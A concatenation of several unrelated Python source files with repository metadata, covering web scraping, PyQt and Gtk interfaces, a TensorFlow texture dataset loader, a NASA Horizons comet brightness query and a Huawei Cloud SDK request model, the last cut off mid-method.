for i in range(20):
http_url = "http://tieba.baidu.com/f?kw=%E5%B9%BF%E4%B8%9C%E5%B7%A5%E4%B8%9A%E5%A4%A7%E5%AD%A6%E5%8D%8E%E7%AB%8B%E5%AD%A6%E9%99%A2&ie=utf-8&pn="+str(s)
response = requests.get(http_url, headers=headers)
html_content = response.content.decode('utf-8')
s += 50
r = open('.\class602\贴吧{}'.format(i+1),'w',encoding='utf-8')
r.write(html_content)
r.close()
'''
tu = ['https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/112/112-bigskin-1.jpg','https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/513/513-bigskin-2.jpg','https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/199/199-bigskin-2.jpg','https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/167/167-bigskin-5.jpg','https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/123/123-bigskin-2.jpg','https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/184/184-bigskin-1.jpg']
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"}
for i in range(6):
response = requests.get(tu[i], headers=headers)
r = open('.\class602\图片{}'.format(i+1),'wb')
r.write(response.content)
r.close()
'''
|
[
"358695374@qq.com"
] |
358695374@qq.com
|
19767bc330f5767b57969673ea3e52cc7fd126c3
|
f7023b1c89a0dda7555b1eb84208a2d30cc9e8f8
|
/experimentFiles/experiment/ui_MainWindow.py
|
67b04bfb2b762476dcf8dc5ab367076846ada9b0
|
[] |
no_license
|
mercedes92/VisualIKExperiment
|
fc7424c0f827aa695bf1d34d8e4c7f5cf21e46d0
|
a9cfa1e541c1822cf7e6bc116c482f5fc289722e
|
refs/heads/master
| 2021-01-10T19:53:36.790976
| 2015-08-21T11:56:54
| 2015-08-21T11:56:54
| 39,624,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,165
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainUI.ui'
#
# Created: Thu Jul 2 18:53:45 2015
# by: PyQt4 UI code generator 4.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_guiDlg(object):
def setupUi(self, guiDlg):
guiDlg.setObjectName(_fromUtf8("guiDlg"))
guiDlg.resize(915, 569)
self.verticalLayout = QtGui.QVBoxLayout(guiDlg)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.testButton = QtGui.QPushButton(guiDlg)
self.testButton.setObjectName(_fromUtf8("testButton"))
self.horizontalLayout.addWidget(self.testButton)
self.stopButton = QtGui.QPushButton(guiDlg)
self.stopButton.setObjectName(_fromUtf8("stopButton"))
self.horizontalLayout.addWidget(self.stopButton)
self.verticalLayout.addLayout(self.horizontalLayout)
self.line = QtGui.QFrame(guiDlg)
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.verticalLayout.addWidget(self.line)
self.errorLabel = QtGui.QLabel(guiDlg)
self.errorLabel.setObjectName(_fromUtf8("errorLabel"))
self.verticalLayout.addWidget(self.errorLabel)
self.scrollArea_2 = QtGui.QScrollArea(guiDlg)
self.scrollArea_2.setWidgetResizable(True)
self.scrollArea_2.setObjectName(_fromUtf8("scrollArea_2"))
self.scrollAreaWidgetContents_2 = QtGui.QWidget()
self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 893, 205))
self.scrollAreaWidgetContents_2.setObjectName(_fromUtf8("scrollAreaWidgetContents_2"))
self.gridLayout_2 = QtGui.QGridLayout(self.scrollAreaWidgetContents_2)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.textEdit_2 = QtGui.QTextEdit(self.scrollAreaWidgetContents_2)
self.textEdit_2.setMinimumSize(QtCore.QSize(800, 100))
self.textEdit_2.setMaximumSize(QtCore.QSize(800, 200))
self.textEdit_2.setObjectName(_fromUtf8("textEdit_2"))
self.gridLayout_2.addWidget(self.textEdit_2, 0, 0, 1, 1)
self.scrollArea_2.setWidget(self.scrollAreaWidgetContents_2)
self.verticalLayout.addWidget(self.scrollArea_2)
self.line_2 = QtGui.QFrame(guiDlg)
self.line_2.setFrameShape(QtGui.QFrame.HLine)
self.line_2.setFrameShadow(QtGui.QFrame.Sunken)
self.line_2.setObjectName(_fromUtf8("line_2"))
self.verticalLayout.addWidget(self.line_2)
self.poseLabel = QtGui.QLabel(guiDlg)
self.poseLabel.setObjectName(_fromUtf8("poseLabel"))
self.verticalLayout.addWidget(self.poseLabel)
self.scrollArea = QtGui.QScrollArea(guiDlg)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName(_fromUtf8("scrollArea"))
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 874, 341))
self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
self.gridLayout = QtGui.QGridLayout(self.scrollAreaWidgetContents)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.textEdit = QtGui.QTextEdit(self.scrollAreaWidgetContents)
self.textEdit.setMinimumSize(QtCore.QSize(800, 300))
self.textEdit.setMaximumSize(QtCore.QSize(16777215, 300))
self.textEdit.setUndoRedoEnabled(False)
self.textEdit.setReadOnly(True)
self.textEdit.setObjectName(_fromUtf8("textEdit"))
self.gridLayout.addWidget(self.textEdit, 1, 0, 1, 1)
self.ficheroLabel = QtGui.QLabel(self.scrollAreaWidgetContents)
self.ficheroLabel.setObjectName(_fromUtf8("ficheroLabel"))
self.gridLayout.addWidget(self.ficheroLabel, 0, 0, 1, 1)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.verticalLayout.addWidget(self.scrollArea)
self.retranslateUi(guiDlg)
QtCore.QMetaObject.connectSlotsByName(guiDlg)
def retranslateUi(self, guiDlg):
guiDlg.setWindowTitle(_translate("guiDlg", "visualiktester", None))
self.testButton.setText(_translate("guiDlg", "Run test", None))
self.stopButton.setText(_translate("guiDlg", "Stop", None))
self.errorLabel.setText(_translate("guiDlg", "Error Detectado:", None))
self.poseLabel.setText(_translate("guiDlg", "Pose Actual:", None))
self.ficheroLabel.setText(_translate("guiDlg", "Datos del fichero: ", None))
|
[
"mpaolett@alumnos.unex.es"
] |
mpaolett@alumnos.unex.es
|
58e2a64da4f5f9392df906fa7ed03792da1a3d60
|
dfbe8dacccf9527c6448e5edaf0568342b918a19
|
/src/dataset/dtd_dataset.py
|
80d2a42084e9ef7ad4d068118a0d2c2eec1b66a1
|
[
"MIT"
] |
permissive
|
FabianGroeger96/semantic-segmentation-dtd
|
e0add90e97f8d052690f3244426d19108bf5fb2c
|
084a0ab5807e912bee80ae2dcf5f22b7ef8579a1
|
refs/heads/main
| 2023-05-09T04:33:15.104499
| 2021-06-02T16:35:06
| 2021-06-02T16:35:06
| 325,009,577
| 3
| 0
|
MIT
| 2020-12-31T08:11:29
| 2020-12-28T12:41:09
|
Python
|
UTF-8
|
Python
| false
| false
| 6,532
|
py
|
import os
import math
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers.experimental.preprocessing import RandomFlip, RandomRotation, RandomContrast, RandomTranslation
from pathlib import Path
from src.settings.settings import Settings
class DTDDataset:
"""
Dataset representation for the Describable Textures Dataset (DTD).
Link to dataset: https://www.robots.ox.ac.uk/~vgg/data/dtd/
Implemented as Singleton.
"""
# instance of the class
__instance = None
@staticmethod
def get_instance(settings: Settings, log: bool = False):
""" Static access method. """
if DTDDataset.__instance is None:
DTDDataset(settings=settings, log=log)
return DTDDataset.__instance
def __init__(self, settings: Settings,
log: bool = False, name: str = 'DTD'):
""" Virtually private constructor. """
# throw exception if at initialization an instance already exists
if DTDDataset.__instance is not None:
raise Exception('Dataset should be a singleton \
and instance is not None at initialization.')
else:
DTDDataset.__instance = self
# parameters
self.log = log
self.name = name
self.settings = settings
self.AUTOTUNE = tf.data.experimental.AUTOTUNE
# True: one hot encoding for categorical
# False: no one hot encoding for sparse catecorical
self.one_hot = True
# define datasets
self.train_ds = None
self.val_ds = None
self.test_ds = None
# define data augmentation
self.data_augmentation = tf.keras.Sequential([
RandomFlip("horizontal_and_vertical"),
RandomRotation(0.4),
RandomContrast(0.4),
RandomTranslation(0.2, 0.2, fill_mode='reflect'),
])
# define the folders of the dataset
train_folder = 'dtd_train'
val_folder = 'dtd_val'
test_folder = 'dtd_test'
# if tiled should be used
if settings.use_tiled:
if log: print('Using tiled dataset')
train_folder += '_tiled'
val_folder += '_tiled'
test_folder += '_tiled'
# load datasets
self.train_ds, train_size = self.create_dataset(
os.path.join(self.settings.dataset_path, train_folder))
self.train_steps = math.floor(train_size / self.settings.batch_size)
self.val_ds, val_size = self.create_dataset(
os.path.join(self.settings.dataset_path, val_folder))
self.val_steps = math.floor(val_size / self.settings.batch_size)
self.test_ds, test_size = self.create_dataset(
os.path.join(self.settings.dataset_path, test_folder),
repeat=False)
self.test_steps = math.floor(test_size / self.settings.batch_size)
def _parse_function(self, image_filename, label_filename, channels: int):
"""
Parse image and label and return them. The image is divided by 255.0 and returned as float,
the label is returned as is in uint8 format.
Args:
image_filename: name of the image file
label_filename: name of the label file
channels: channels of the input image, (the label is always one channel)
Returns:
tensors for the image and label read operations
"""
image_string = tf.io.read_file(image_filename)
image_decoded = tf.image.decode_png(image_string, channels=channels)
image_decoded = tf.image.convert_image_dtype(
image_decoded, dtype=tf.float32)
# normalize image to zero mean
image = tf.multiply(image_decoded, 2.0)
image = tf.subtract(image, 1.0)
label_string = tf.io.read_file(label_filename)
label = tf.image.decode_png(label_string, dtype=tf.uint8, channels=1)
return image, label
@staticmethod
def load_files(data_dir: str):
path = Path(data_dir)
image_files = list(path.glob('image*.png'))
label_files = list(path.glob('label*.png'))
# make sure they are in the same order
image_files.sort()
label_files.sort()
image_files_array = np.asarray([str(p) for p in image_files])
label_files_array = np.asarray([str(p) for p in label_files])
return image_files_array, label_files_array
def create_dataset(self, data_dir: str, repeat: bool=True):
image_files_array, label_files_array = self.load_files(data_dir)
dataset = tf.data.Dataset.from_tensor_slices((image_files_array,
label_files_array))
# shuffle the filename, unfortunately, then we cannot cache them
dataset = dataset.shuffle(buffer_size=10000)
# read the images
dataset = dataset.map(
lambda image, file: self._parse_function(
image, file, self.settings.patch_channels))
# Set the sizes of the input image, as keras needs to know them
dataset = dataset.map(
lambda x, y: (
tf.reshape(x, shape=(
self.settings.patch_size, self.settings.patch_size, self.settings.patch_channels)),
tf.reshape(y, shape=(
self.settings.patch_size, self.settings.patch_size))))
# cut center of the label image in order to use valid filtering in the
# network
b = self.settings.patch_border
if b != 0:
dataset = dataset.map(lambda x, y:
(x, y[b:-b, b:-b]))
if self.one_hot:
# reshape the labels to 1d array and do one-hot encoding
dataset = dataset.map(lambda x, y:
(x, tf.reshape(y, shape=[-1])))
dataset = dataset.map(
lambda x, y: (
x, tf.one_hot(
y, depth=self.settings.n_classes, dtype=tf.float32)))
if self.settings.augment:
dataset = dataset.map(
lambda x, y: (tf.squeeze(self.data_augmentation(tf.expand_dims(x, 0), training=True), 0), y),
num_parallel_calls=self.AUTOTUNE)
# batch dataset
dataset = dataset.batch(self.settings.batch_size).prefetch(1000)
# repeat dataset
if repeat:
dataset = dataset.repeat()
return dataset, image_files_array.size
|
[
"fabian.groeger@bluewin.ch"
] |
fabian.groeger@bluewin.ch
|
453b76f5dada5d070199968e11ec8472ff2c4592
|
8ae061d040e16305d4025128b9bf0dfa2d77e6e1
|
/wordbook/pymodule/machine_learning/module/preprocessing/__init__.py
|
86473b6829de9d55cba7c2eba4aa35d20b70a6a6
|
[] |
no_license
|
shiinokinoki/flashcard
|
313a6b14d1016b2f9b3cd14b1792d3bc0f7fc2cd
|
144f867d364a1c53a457a0a8bebcc0e42da6c39f
|
refs/heads/master
| 2022-12-17T11:26:00.241838
| 2020-09-19T11:42:46
| 2020-09-19T11:42:46
| 294,350,980
| 0
| 0
| null | 2020-09-18T01:20:02
| 2020-09-10T08:33:20
|
CSS
|
UTF-8
|
Python
| false
| false
| 61
|
py
|
from ._data import Image_for_ocr
__all__ = ['Image_for_ocr']
|
[
"shue@shiikishuueinoMacBook-Air.local"
] |
shue@shiikishuueinoMacBook-Air.local
|
74c64ce4ae04ef8be29d1ae4925caa57cc9de28c
|
10cb919d03d1e50dda253c6e771d470c035f92d1
|
/proyecto/MotoGP/motogp_app.py
|
ba8fd9b0fd1f6c5b52d59405aa1df08e6db0097d
|
[] |
no_license
|
JoseVP/Python-Avanzado
|
0c1dc0f75dfd259cadfd30d7ce4d2ae3cd3bbce9
|
ca7c8e346cb170b170af2f5931c02f0d684ec109
|
refs/heads/master
| 2021-01-10T21:28:07.926457
| 2012-05-30T10:33:25
| 2012-05-30T10:33:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,358
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import MySQLdb
from gi.repository import Gtk
import subprocess
class Moto_GP:
#-------------------FUNCIONES INTERNAS---------------------#
#Carga los circuitos iniciales en los botones de la Ventana de inicio
def cargar_circuitos_iniciales(self):
self.carreras = ['Qatar',
'España',
'Portugal',
'Francia',
'Cataluña',
'Gran Bretaña',
'Holanda',
'Alemania',
'Italia',
'Estados Unidos' ,
'Indianapolis',
'Republica Checa',
'San Marino' ,
'Aragon',
'Japon' ,
'Malasia',
'Australia',
'Valencia']
i=1
#Cargamos los nombres de las carreras en los botones de inicio
for carrera in self.carreras:
boton = self.builder.get_object('button%s'%i)
boton.set_label(carrera)
i+=1
#Carga los detalles del circuito deseado
def cargar_informacion_circuito(self,circuito):
Conexion = MySQLdb.connect(host='localhost', user='admin',passwd='motogpadmin', db='MotogpDB')
micursor = Conexion.cursor(MySQLdb.cursors.DictCursor)
query = "SELECT * FROM circuitos WHERE gran_premio = '%s'" % self.grandes_premios[circuito]
micursor.execute(query)
datos = micursor.fetchone()
#Rellenamos las etiquetas con la informacion obtenida
texto_datos = self.builder.get_object("texto_longitud")
texto_datos.set_label(datos['longitud'])
texto_datos = self.builder.get_object("texto_ancho")
texto_datos.set_label(datos['anchura'])
texto_datos = self.builder.get_object("texto_curvas_der")
texto_datos.set_label(str(datos['curvas_der']))
texto_datos = self.builder.get_object("texto_curvas_izq")
texto_datos.set_label(str(datos['curvas_izq']))
texto_datos = self.builder.get_object("texto_recta")
texto_datos.set_label(datos['recta_larga'])
texto_datos = self.builder.get_object("texto_fecha_const")
texto_datos.set_label(datos['fecha_construccion'])
texto_datos = self.builder.get_object("texto_fecha_mod")
texto_datos.set_label(datos['fecha_modificacion'])
texto_datos = self.builder.get_object("label_nombre")
texto_datos.set_label('Gran Premio de %s - %s' % (circuito,datos['nombre']))
#Cerramos la conexion con la base de datos
micursor.close ()
Conexion.close()
#Carga los records del circuito deseado
def cargar_records_circuito(self,circuito):
Conexion = MySQLdb.connect(host='localhost', user='admin',passwd='motogpadmin', db='MotogpDB')
micursor = Conexion.cursor(MySQLdb.cursors.DictCursor)
#Obtenemos el id asociado al circuito para obtener los records exactos del circuito
query = "SELECT id FROM circuitos WHERE gran_premio = '%s'" % self.grandes_premios[circuito]
micursor.execute(query)
id_circuito= micursor.fetchone()
query = "SELECT * FROM records_circuitos WHERE id_circuito = '%s' ORDER BY categoria DESC" % id_circuito['id']
micursor.execute(query)
records = micursor.fetchall()
grid = self.builder.get_object("grid_records")
#Guardamos la categoria inicial para compararla y ver cuando cambia la categoria en los datos
cat_act = records[0]['categoria']
i = 2
for record in records:
if (record['categoria'] != cat_act):
#si la categoria ha cambiado comprobamos que categoria es
#para asignar la fila en la que debemos empezar a rellenar los datos
if(record['categoria'] == 'MotoGP'):
i=2
elif (record['categoria'] == 'Moto2'):
i=7
elif (record['categoria'] == '125cc'):
i=12
cat_act = record['categoria']
label = self.builder.get_object("label_%s_%s" %(i,1))
#si temporada = 0 significa que no hay resultado
#asi que en vez de mostrar un 0 en ese campo lo mostramos vacio
if (record['temporada'] != 0):
label.set_label(str(record['temporada']))
else:
label.set_label('')
label = self.builder.get_object("label_%s_%s" %(i,2))
label.set_label(record['piloto'])
label = self.builder.get_object("label_%s_%s" %(i,3))
label.set_label(record['motocicleta'])
label = self.builder.get_object("label_%s_%s" %(i,4))
label.set_label(record['tiempo'])
label = self.builder.get_object("label_%s_%s" %(i,5))
label.set_label(record['velocidad'])
i+=1
grid.show_all()
#Devuelve una tupla con la imagen del circuito y de la bandera correspondiente
def cargar_imagenes(self,circuito):
imagenes= { 'Qatar' : 'resources/circuitos/qatar',
'España' : 'resources/circuitos/espana',
'Portugal' : 'resources/circuitos/portugal',
'Francia' : 'resources/circuitos/francia',
'Cataluña' : 'resources/circuitos/catalunya',
'Gran Bretaña' : 'resources/circuitos/gran_bretanya',
'Holanda' : 'resources/circuitos/holanda',
'Alemania' : 'resources/circuitos/alemania',
'Italia' : 'resources/circuitos/italia',
'Estados Unidos' : 'resources/circuitos/estados_unidos',
'Indianapolis' : 'resources/circuitos/indianapolis',
'Republica Checa' : 'resources/circuitos/republica_checa',
'San Marino' : 'resources/circuitos/san_marino',
'Aragon' : 'resources/circuitos/aragon',
'Japon' : 'resources/circuitos/japon',
'Malasia' : 'resources/circuitos/malasia',
'Australia' : 'resources/circuitos/australia',
'Valencia' : 'resources/circuitos/valencia',
}
return imagenes[circuito]+'-cir.jpg',imagenes[circuito]+'-band.png'
#Lanza desde el sistema operativo el scrapper para obtener la informacion desde www.motogp.com/es
def ejecutar_scrapper(self):
Conexion = MySQLdb.connect(host='localhost', user='admin',passwd='motogpadmin', db='MotogpDB')
micursor = Conexion.cursor(MySQLdb.cursors.DictCursor)
#Para evitar la acumulación innecesaria de datos eliminamos primero las tablas
#Solo necesitamos eliminar la tabla circuitos ya que por cascada
#se vacia automaticamente la de records
query = "DELETE FROM circuitos WHERE 1"
micursor.execute(query)
Conexion.commit()
micursor.close()
Conexion.close()
#se lanza el scrapper sin log para no mostrar nada por el terminal
subproceso = subprocess.Popen(['scrapy','crawl', 'circuitos','--nolog'])
subprocess.Popen.wait(subproceso)
#Comprueba que las tablas existan y si no es asi,las crea
#De existir las tabas se comprueba que haya exactamente 18 circuitos
def comprobar_tablas(self):
Conexion = MySQLdb.connect(host='localhost', user='admin',passwd='motogpadmin', db='MotogpDB')
micursor = Conexion.cursor(MySQLdb.cursors.DictCursor)
query = "show tables"
micursor.execute(query)
tablas = micursor.fetchall()
tabla_circuitos = False
tabla_records = False
tabla_correcta = True
if tablas:
for tabla in tablas:
if 'circuitos' == tabla['Tables_in_MotogpDB']:
tabla_circuitos = True
if 'records_circuitos' == tabla['Tables_in_MotogpDB']:
tabla_records = True
if not tabla_circuitos:
query =" CREATE TABLE circuitos (id int(10) auto_increment primary key,gran_premio varchar(100) not null,nombre varchar(100) not null,longitud varchar(100),anchura varchar(100),curvas_der int(2),curvas_izq int(2),recta_larga varchar(100),fecha_construccion varchar(100),fecha_modificacion varchar(100))ENGINE=INNODB"
micursor.execute(query)
Conexion.commit()
else:
query = " Select id from circuitos "
num = micursor.execute(query)
if num != 18 :
tabla_correcta=False
if not tabla_records:
query =" CREATE TABLE records_circuitos (id int(10) auto_increment primary key,id_circuito int(10) not null,categoria varchar(100) not null,record varchar(100) not null,temporada int(4) not null,piloto varchar(100) not null,motocicleta varchar(100),tiempo varchar(100),velocidad varchar(100),foreign key (id_circuito) references circuitos(id) on delete cascade)ENGINE=INNODB;"
micursor.execute(query)
Conexion.commit()
if not tabla_circuitos or not tabla_records or not tabla_correcta:
return False
else:
return True
def onInitialCircuit(self,boton):
self.onVerCircuito(boton)
self.window_inicial.hide()
self.window.show_all()
def onVerCircuito(self,menuitem):
#cargamos las imagenes del circuito y la bandera del pais
imagen = self.builder.get_object('imagen_circuito')
circuito = menuitem.get_label()
imagenes = self.cargar_imagenes(circuito)
imagen.set_from_file(imagenes[0])
#cargamos la informacion y los records
self.cargar_informacion_circuito(circuito)
self.cargar_records_circuito(circuito)
#ponemos como icono de la ventana la bandera del pais
self.window.set_icon_from_file(imagenes[1])
bandera = self.builder.get_object('imagen_bandera')
bandera.set_from_file(imagenes[1])
self.window.set_title("Circuito de %s" % circuito)
def onShowAbout(self,menuitem):
about = self.builder.get_object("about_dialog")
about.run()
about.destroy()
def onActualizarCircuitos(self,item):
#si el label del item es Aceptar significa que viene
# del dialogo de error de comprobacion de tablas
#por lo que no mostramos el dialogo para actualizacion
if(item.get_label() != "Aceptar"):
dialogo = self.builder.get_object("dialogo_actualizar")
respuesta = dialogo.run()
else:
respuesta = 1
self.cargar_circuitos_iniciales()
self.window_inicial.show_all()
self.dialogo.hide()
if respuesta == 1 :
self.ejecutar_scrapper()
#Una vez actualizados los datos se lo indicamos al usuario
#suprimimos los botones para obligar a cerrar la ventana
#y evitar que manipule la ventana principal
texto = self.builder.get_object("label_actualizando")
texto.set_label("Informacion de los circuitos Actualizada")
boton = self.builder.get_object("button_aceptar")
boton.hide()
boton = self.builder.get_object("button_cancelar")
boton.hide()
else:
dialogo.destroy()
def __init__(self):
self.builder = Gtk.Builder()
self.builder.add_from_file("interfaz.glade")
self.handlers = { "onDeleteWindow": Gtk.main_quit,
"onVerCircuito": self.onVerCircuito,
"onActualizarCircuitos":self.onActualizarCircuitos,
"onInitialCircuit":self.onInitialCircuit,
"onShowAbout":self.onShowAbout
}
self.builder.connect_signals(self.handlers)
self.window = self.builder.get_object("window1")
self.window_inicial = self.builder.get_object("window2")
self.grandes_premios = { 'Qatar':'QAT' ,
'España':'SPA',
'Portugal':'POR',
'Francia':'FRA',
'Cataluña':'CAT',
'Gran Bretaña':'GBR',
'Holanda':'NED',
'Alemania':'GER',
'Italia':'ITA',
'Estados Unidos':'USA' ,
'Indianapolis':'INP',
'Republica Checa':'CZE',
'San Marino':'RSM' ,
'Aragon':'ARA',
'Japon':'JPN' ,
'Malasia':'MAL',
'Australia':'AUS',
'Valencia':'VAL'}
#Antes de mostrar ninguna ventana se comprueba la base de datos
if (self.comprobar_tablas()):
self.cargar_circuitos_iniciales()
self.window_inicial.show_all()
else:
self.dialogo = self.builder.get_object('dialogo_error_tablas')
self.dialogo.show_all()
def main():
window = Moto_GP()
Gtk.main()
return 0
if __name__ == '__main__':
main()
|
[
"josevalenzuelaperez@gmail.com"
] |
josevalenzuelaperez@gmail.com
|
29d967e22202502a0489bcd8d31f34e6cac31bb2
|
5be9fc95e24d4ee571f0edc4039caf7465563c06
|
/Problems/The army of units/main.py
|
4e708eb8148ea805daaa5c7bcaecb6adabfd7925
|
[] |
no_license
|
helenlavr/Coffee-Machine
|
8a7e4ad83e36925d991346c8e87b6ccdb9c59681
|
938cfec67390185b929ccfca0d00dbdbb4ba489f
|
refs/heads/master
| 2023-01-01T21:27:22.449491
| 2020-10-15T10:40:41
| 2020-10-15T10:40:41
| 304,292,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 232
|
py
|
units = int(input())
if units >= 1000:
print('legion')
elif units >= 500:
print('swarm')
elif units >= 50:
print('horde')
elif units >= 10:
print('pack')
elif units >= 1:
print('few')
else:
print('no army')
|
[
"helenlav@stud.ntnu.no"
] |
helenlav@stud.ntnu.no
|
9afe8e0f69ee47f22bd74b8e222360bc796ad45f
|
308dbc263ab71b1f424d9130e11e9d7d65de7945
|
/model/Armadura.py
|
b0bfbfb7f8a310b5b26c4f0a22391d0d5c685a2e
|
[] |
no_license
|
rfgonzalez13/MHRiseApp
|
37cdb415568a6fc302899ea17da3746858809ae9
|
5166ef4c2027bfc6e7e9510eb1cfbbc50562e5a0
|
refs/heads/master
| 2023-07-25T08:49:31.516496
| 2021-09-09T15:40:26
| 2021-09-09T15:40:26
| 373,656,668
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
# coding = utf-8
from google.appengine.ext import ndb
class Armadura(ndb.Model):
nombre = ndb.StringProperty(required=True, indexed=True)
pk_nombre = ndb.StringProperty(required=True, indexed=True)
casco = ndb.IntegerProperty(indexed=True)
cota = ndb.IntegerProperty(indexed=True)
brazales = ndb.IntegerProperty(indexed=True)
faja = ndb.IntegerProperty(indexed=True)
grebas = ndb.IntegerProperty(indexed=True)
|
[
"rfgonzalez@esei.uvigo.es"
] |
rfgonzalez@esei.uvigo.es
|
49abdf437aff0bb64af3510ebc54df23c69483f5
|
7e3a860c5204ad3ba4320f7a5d5bb0d796c3d4fa
|
/scripts/helper/get_brightness.py
|
71fe14c7820506038407f1584509000df49518af
|
[] |
no_license
|
dot361/Weak-radio-signal-data-processing
|
9a019b5bdd1258b9acf9852122f03588df67f12d
|
2f305263948016470c27da222e72d41a9e802a26
|
refs/heads/master
| 2022-11-14T21:53:28.041898
| 2020-07-06T13:48:28
| 2020-07-06T13:48:28
| 268,297,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,715
|
py
|
import urllib
from datetime import datetime,timedelta
import sys
import numpy as numpy
def get_ra_dec(start_time, stop_time, obj):
lat = 21.847222;
lon = 57.5593055;
alt = 10;
step_size = '1 h'
if(obj == "panstarrs"):
obj_name = 'C/2017 T2'
if(obj == "atlas"):
#obj_name = 'C/2019 Y4'
obj_name = '90004451'
if(obj == "swan"):
#obj_name = 'C/2019 Y4'
obj_name = 'C/2020 F8'
coord_str = str(lat)+','+str(lon)+','+str(alt)
url = "https://ssd.jpl.nasa.gov/horizons_batch.cgi?batch=1&COMMAND='"+ obj_name +"'&CENTER='coord'&SITE_COORD='"+ coord_str +"'&MAKE_EPHEM='YES'&TABLE_TYPE='OBSERVER'&START_TIME='"+ start_time +"'&STOP_TIME='" + stop_time+ "'&STEP_SIZE='"+ step_size +"'&QUANTITIES='1,9'&CSV_FORMAT='YES'"
print(url)
s = urllib.urlopen(url).read()
result = ((s.split("$$SOE"))[1].split("$$EOE")[0]).split('\n')
#print("result", len(result))
#print("result", result[2])
date = list()
mag = list()
for i in result:
if(len(i) != 0):
#print(i)
data = i.replace(" ", "")
#print("data", data)
split_rez = data.split(',')
split_rez[4] = split_rez[4].replace("+","")
date.append(split_rez[0])
mag.append(split_rez[5])
#print(date)
print(mag)
print(len(mag), len(date))
index_min = min(range(len(mag)), key=mag.__getitem__)
print(index_min)
maxBrightness = mag[index_min]
dateIndex = date[index_min]
print(maxBrightness, dateIndex)
#print(split_rez[0], split_rez[5], split_rez[4], split_rez[6])
return date, mag
get_ra_dec(sys.argv[1], sys.argv[2], sys.argv[3])
|
[
"s7_jasmon_g@venta.lv"
] |
s7_jasmon_g@venta.lv
|
7f027308fcfb3c04e668a3e684a1c89c3d18adba
|
9b64f0f04707a3a18968fd8f8a3ace718cd597bc
|
/huaweicloud-sdk-lts/huaweicloudsdklts/v2/model/delete_log_stream_request.py
|
03161ca879c09c3628e30d67bc31b138c95aef90
|
[
"Apache-2.0"
] |
permissive
|
jaminGH/huaweicloud-sdk-python-v3
|
eeecb3fb0f3396a475995df36d17095038615fba
|
83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b
|
refs/heads/master
| 2023-06-18T11:49:13.958677
| 2021-07-16T07:57:47
| 2021-07-16T07:57:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,000
|
py
|
# coding: utf-8
import re
import six
class DeleteLogStreamRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'log_group_id': 'str',
'log_stream_id': 'str'
}
attribute_map = {
'log_group_id': 'log_group_id',
'log_stream_id': 'log_stream_id'
}
def __init__(self, log_group_id=None, log_stream_id=None):
"""DeleteLogStreamRequest - a model defined in huaweicloud sdk"""
self._log_group_id = None
self._log_stream_id = None
self.discriminator = None
self.log_group_id = log_group_id
self.log_stream_id = log_stream_id
@property
def log_group_id(self):
"""Gets the log_group_id of this DeleteLogStreamRequest.
租户想删除的日志流所在的日志组的groupid,一般为36位字符串。
:return: The log_group_id of this DeleteLogStreamRequest.
:rtype: str
"""
return self._log_group_id
@log_group_id.setter
def log_group_id(self, log_group_id):
"""Sets the log_group_id of this DeleteLogStreamRequest.
租户想删除的日志流所在的日志组的groupid,一般为36位字符串。
:param log_group_id: The log_group_id of this DeleteLogStreamRequest.
:type: str
"""
self._log_group_id = log_group_id
@property
def log_stream_id(self):
"""Gets the log_stream_id of this DeleteLogStreamRequest.
需要删除的日志流ID,获取方式请参见:获取账号ID、项目ID、日志组ID、日志流ID(https://support.huaweicloud.com/api-lts/lts_api_0006.html)。
:return: The log_stream_id of this DeleteLogStreamRequest.
:rtype: str
"""
return self._log_stream_id
@log_stream_id.setter
def log_stream_id(self, log_stream_id):
"""Sets the log_stream_id of this DeleteLogStreamRequest.
需要删除的日志流ID,获取方式请参见:获取账号ID、项目ID、日志组ID、日志流ID(https://support.huaweicloud.com/api-lts/lts_api_0006.html)。
:param log_stream_id: The log_stream_id of this DeleteLogStreamRequest.
:type: str
"""
self._log_stream_id = log_stream_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
